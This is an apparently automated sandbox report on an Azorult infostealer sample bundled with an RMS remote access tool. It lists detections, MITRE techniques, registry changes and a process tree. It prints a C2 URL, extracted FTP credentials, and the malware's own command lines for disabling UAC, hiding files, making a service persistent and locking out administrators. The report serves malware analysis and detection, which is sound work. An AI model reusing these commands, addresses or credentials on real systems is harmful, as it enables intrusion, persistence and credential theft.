azorult | a2d3d6430f6775951cf988d960cfae4093d7a1e4d0f684ddfffaf4599ace9a71

Resubmissions

18-11-2020 14:18

201118-dj27sn3f52 10

18-11-2020 13:42

201118-1arz86e7w6 10

18-11-2020 13:38

201118-n8jh228ctn 10

Analysis

max time kernel
62s
max time network
73s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 13:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LtHv0O2KZDK4M637.bin.exe

Score

10^/10

azorult rms aspackv2 discovery evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral10/files/0x000100000001ab8e-45.dat	acprotect
behavioral10/files/0x000100000001ab8f-46.dat	acprotect

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral10/files/0x000200000001a50e-34.dat	aspack_v212_v242
behavioral10/files/0x000200000001a50e-33.dat	aspack_v212_v242
behavioral10/files/0x000200000001a50e-40.dat	aspack_v212_v242
behavioral10/files/0x000200000001a50e-42.dat	aspack_v212_v242
behavioral10/files/0x000200000001a50e-44.dat	aspack_v212_v242
behavioral10/files/0x00030000000006a5-47.dat	aspack_v212_v242
behavioral10/files/0x00030000000006a5-53.dat	aspack_v212_v242
behavioral10/files/0x00030000000006a5-54.dat	aspack_v212_v242
behavioral10/files/0x00030000000006a5-69.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LtHv0O2KZDK4M637.bin.exe

Executes dropped EXE 18 IoCs

pid	Process
2768	wini.exe
2696	winit.exe
2164	rutserv.exe
1992	rutserv.exe
2236	rutserv.exe
3444	rutserv.exe
1468	sys.exe
2412	rfusclient.exe
2388	rfusclient.exe
2432	rfusclient.exe
3744	cheat.exe
664	taskhost.exe
1584	taskhostw.exe
2736	winlogon.exe
668	R8.exe
4176	Rar.exe
4680	RDPWInst.exe
4404	RDPWInst.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral10/files/0x000100000001ab8e-45.dat	upx
behavioral10/files/0x000100000001ab8f-46.dat	upx
behavioral10/files/0x000200000001ab98-96.dat	upx
behavioral10/files/0x000200000001ab98-97.dat	upx

Loads dropped DLL 5 IoCs

pid	Process
1468	sys.exe
1468	sys.exe
1468	sys.exe
1468	sys.exe
8	svchost.exe

Modifies file permissions 1 TTPs 14 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4564	icacls.exe
1428	icacls.exe
5040	icacls.exe
4684	icacls.exe
4848	icacls.exe
912	icacls.exe
4604	icacls.exe
4620	icacls.exe
4120	icacls.exe
4996	icacls.exe
1716	icacls.exe
732	icacls.exe
4504	icacls.exe
1788	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	LtHv0O2KZDK4M637.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	LtHv0O2KZDK4M637.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.bin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.bin.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.bin.exe

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\boy.exe	taskhost.exe
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sys.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sys.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
3908	timeout.exe
312	timeout.exe
1620	timeout.exe
2080	timeout.exe
4272	timeout.exe
4864	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4600	ipconfig.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
216	taskkill.exe
1604	taskkill.exe
4240	taskkill.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database	winit.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	LtHv0O2KZDK4M637.bin.exe

Runs .reg file with regedit 2 IoCs

pid	Process
2988	regedit.exe
3904	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
2164	rutserv.exe
1992	rutserv.exe
1992	rutserv.exe
2236	rutserv.exe
2236	rutserv.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe
984	LtHv0O2KZDK4M637.bin.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1584	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
636	Process not Found
636	Process not Found
636	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2432	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2164	rutserv.exe
Token: SeDebugPrivilege	2236	rutserv.exe
Token: SeTakeOwnershipPrivilege	3444	rutserv.exe
Token: SeTcbPrivilege	3444	rutserv.exe
Token: SeTcbPrivilege	3444	rutserv.exe
Token: SeDebugPrivilege	984	LtHv0O2KZDK4M637.bin.exe
Token: 9800749783901672131	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 274877907072	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 17614262791034696090	984	LtHv0O2KZDK4M637.bin.exe
Token: SeCreateTokenPrivilege	984	LtHv0O2KZDK4M637.bin.exe
Token: 220676626295829165	984	LtHv0O2KZDK4M637.bin.exe
Token: 4294967302	984	LtHv0O2KZDK4M637.bin.exe
Token: 2954879187564134559	984	LtHv0O2KZDK4M637.bin.exe
Token: 9920249032596265192	984	LtHv0O2KZDK4M637.bin.exe
Token: SeTakeOwnershipPrivilege	984	LtHv0O2KZDK4M637.bin.exe
Token: 9223374061664402713	984	LtHv0O2KZDK4M637.bin.exe
Token: 8589934609	984	LtHv0O2KZDK4M637.bin.exe
Token: 8589934609	984	LtHv0O2KZDK4M637.bin.exe
Token: 10641221009908170752	984	LtHv0O2KZDK4M637.bin.exe
Token: 281477286448623	984	LtHv0O2KZDK4M637.bin.exe
Token: 30399589615342016	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 37155092135616248	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 6293669620	984	LtHv0O2KZDK4M637.bin.exe
Token: 21710510635	984	LtHv0O2KZDK4M637.bin.exe
Token: 10527315420	984	LtHv0O2KZDK4M637.bin.exe
Token: 51539607552	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 579867377021645078	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 1374389534720	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 580148851998355734	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 1374389534720	984	LtHv0O2KZDK4M637.bin.exe
Token: 580148797807948212	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 188978561024	984	LtHv0O2KZDK4M637.bin.exe
Token: 580148849330778551	984	LtHv0O2KZDK4M637.bin.exe
Token: 8320987296359586348	984	LtHv0O2KZDK4M637.bin.exe
Token: 10527315420	984	LtHv0O2KZDK4M637.bin.exe
Token: 343597383681	984	LtHv0O2KZDK4M637.bin.exe
Token: 43029094230	984	LtHv0O2KZDK4M637.bin.exe
Token: 341863557001808664	984	LtHv0O2KZDK4M637.bin.exe
Token: 9799851482751478265	984	LtHv0O2KZDK4M637.bin.exe
Token: 13303070993073847246	984	LtHv0O2KZDK4M637.bin.exe
Token: 51539607552	984	LtHv0O2KZDK4M637.bin.exe
Token: 0	984	LtHv0O2KZDK4M637.bin.exe
Token: 52514940786	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 341689696674966296	984	LtHv0O2KZDK4M637.bin.exe
Token: 1080863910568919553	984	LtHv0O2KZDK4M637.bin.exe
Token: 79494248	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 6937813002834471071	984	LtHv0O2KZDK4M637.bin.exe
Token: 70371053915631	984	LtHv0O2KZDK4M637.bin.exe
Token: 98784247812	984	LtHv0O2KZDK4M637.bin.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
2696	winit.exe
2164	rutserv.exe
1992	rutserv.exe
2236	rutserv.exe
3444	rutserv.exe
508	WinMail.exe
1348	WinMail.exe
664	taskhost.exe
1584	taskhostw.exe
2736	winlogon.exe
668	R8.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 984 wrote to memory of 2768	984	LtHv0O2KZDK4M637.bin.exe	75
PID 984 wrote to memory of 2768	984	LtHv0O2KZDK4M637.bin.exe	75
PID 984 wrote to memory of 2768	984	LtHv0O2KZDK4M637.bin.exe	75
PID 2768 wrote to memory of 188	2768	wini.exe	76
PID 2768 wrote to memory of 188	2768	wini.exe	76
PID 2768 wrote to memory of 188	2768	wini.exe	76
PID 188 wrote to memory of 3284	188	WScript.exe	78
PID 188 wrote to memory of 3284	188	WScript.exe	78
PID 188 wrote to memory of 3284	188	WScript.exe	78
PID 2768 wrote to memory of 2696	2768	wini.exe	77
PID 2768 wrote to memory of 2696	2768	wini.exe	77
PID 2768 wrote to memory of 2696	2768	wini.exe	77
PID 3284 wrote to memory of 2988	3284	cmd.exe	81
PID 3284 wrote to memory of 2988	3284	cmd.exe	81
PID 3284 wrote to memory of 2988	3284	cmd.exe	81
PID 3284 wrote to memory of 3904	3284	cmd.exe	82
PID 3284 wrote to memory of 3904	3284	cmd.exe	82
PID 3284 wrote to memory of 3904	3284	cmd.exe	82
PID 3284 wrote to memory of 3908	3284	cmd.exe	83
PID 3284 wrote to memory of 3908	3284	cmd.exe	83
PID 3284 wrote to memory of 3908	3284	cmd.exe	83
PID 3284 wrote to memory of 2164	3284	cmd.exe	87
PID 3284 wrote to memory of 2164	3284	cmd.exe	87
PID 3284 wrote to memory of 2164	3284	cmd.exe	87
PID 3284 wrote to memory of 1992	3284	cmd.exe	88
PID 3284 wrote to memory of 1992	3284	cmd.exe	88
PID 3284 wrote to memory of 1992	3284	cmd.exe	88
PID 3284 wrote to memory of 2236	3284	cmd.exe	89
PID 3284 wrote to memory of 2236	3284	cmd.exe	89
PID 3284 wrote to memory of 2236	3284	cmd.exe	89
PID 984 wrote to memory of 1468	984	LtHv0O2KZDK4M637.bin.exe	91
PID 984 wrote to memory of 1468	984	LtHv0O2KZDK4M637.bin.exe	91
PID 984 wrote to memory of 1468	984	LtHv0O2KZDK4M637.bin.exe	91
PID 3444 wrote to memory of 2412	3444	rutserv.exe	93
PID 3444 wrote to memory of 2412	3444	rutserv.exe	93
PID 3444 wrote to memory of 2412	3444	rutserv.exe	93
PID 3444 wrote to memory of 2388	3444	rutserv.exe	92
PID 3444 wrote to memory of 2388	3444	rutserv.exe	92
PID 3444 wrote to memory of 2388	3444	rutserv.exe	92
PID 3284 wrote to memory of 2180	3284	cmd.exe	94
PID 3284 wrote to memory of 2180	3284	cmd.exe	94
PID 3284 wrote to memory of 2180	3284	cmd.exe	94
PID 3284 wrote to memory of 3108	3284	cmd.exe	95
PID 3284 wrote to memory of 3108	3284	cmd.exe	95
PID 3284 wrote to memory of 3108	3284	cmd.exe	95
PID 3284 wrote to memory of 224	3284	cmd.exe	96
PID 3284 wrote to memory of 224	3284	cmd.exe	96
PID 3284 wrote to memory of 224	3284	cmd.exe	96
PID 3284 wrote to memory of 828	3284	cmd.exe	97
PID 3284 wrote to memory of 828	3284	cmd.exe	97
PID 3284 wrote to memory of 828	3284	cmd.exe	97
PID 3284 wrote to memory of 3580	3284	cmd.exe	98
PID 3284 wrote to memory of 3580	3284	cmd.exe	98
PID 3284 wrote to memory of 3580	3284	cmd.exe	98
PID 2696 wrote to memory of 508	2696	winit.exe	99
PID 2696 wrote to memory of 508	2696	winit.exe	99
PID 2696 wrote to memory of 508	2696	winit.exe	99
PID 508 wrote to memory of 1348	508	WinMail.exe	100
PID 508 wrote to memory of 1348	508	WinMail.exe	100
PID 2388 wrote to memory of 2432	2388	rfusclient.exe	101
PID 2388 wrote to memory of 2432	2388	rfusclient.exe	101
PID 2388 wrote to memory of 2432	2388	rfusclient.exe	101
PID 2696 wrote to memory of 2244	2696	winit.exe	102
PID 2696 wrote to memory of 2244	2696	winit.exe	102

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	LtHv0O2KZDK4M637.bin.exe

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2416	attrib.exe
5084	attrib.exe
2180	attrib.exe
3108	attrib.exe
4840	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe
"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:984
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3284
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:2988
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:3904
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:3908
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2164
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1992
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2236
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:2180
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:3108
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:224
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:828
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:3580
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Program Files (x86)\Windows Mail\WinMail.exe
      "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:508
    - - C:\Program Files\Windows Mail\WinMail.exe
        
        "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1348
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:2244
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:312
- C:\ProgramData\install\sys.exe
  C:\ProgramData\install\sys.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  PID:1468
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
    3⤵
    PID:4044
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\system32\timeout.exe 3
      4⤵
      Delays execution with timeout.exe
      PID:1620
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  PID:3744
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:664
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      NTFS ADS
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:1584
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2736
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:4548
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:4600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:4700
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:4784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
      4⤵
      PID:3076
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
        5⤵
        Modifies file permissions
        
        PID:1716
  - - C:\Windows\SysWOW64\cmd.exe
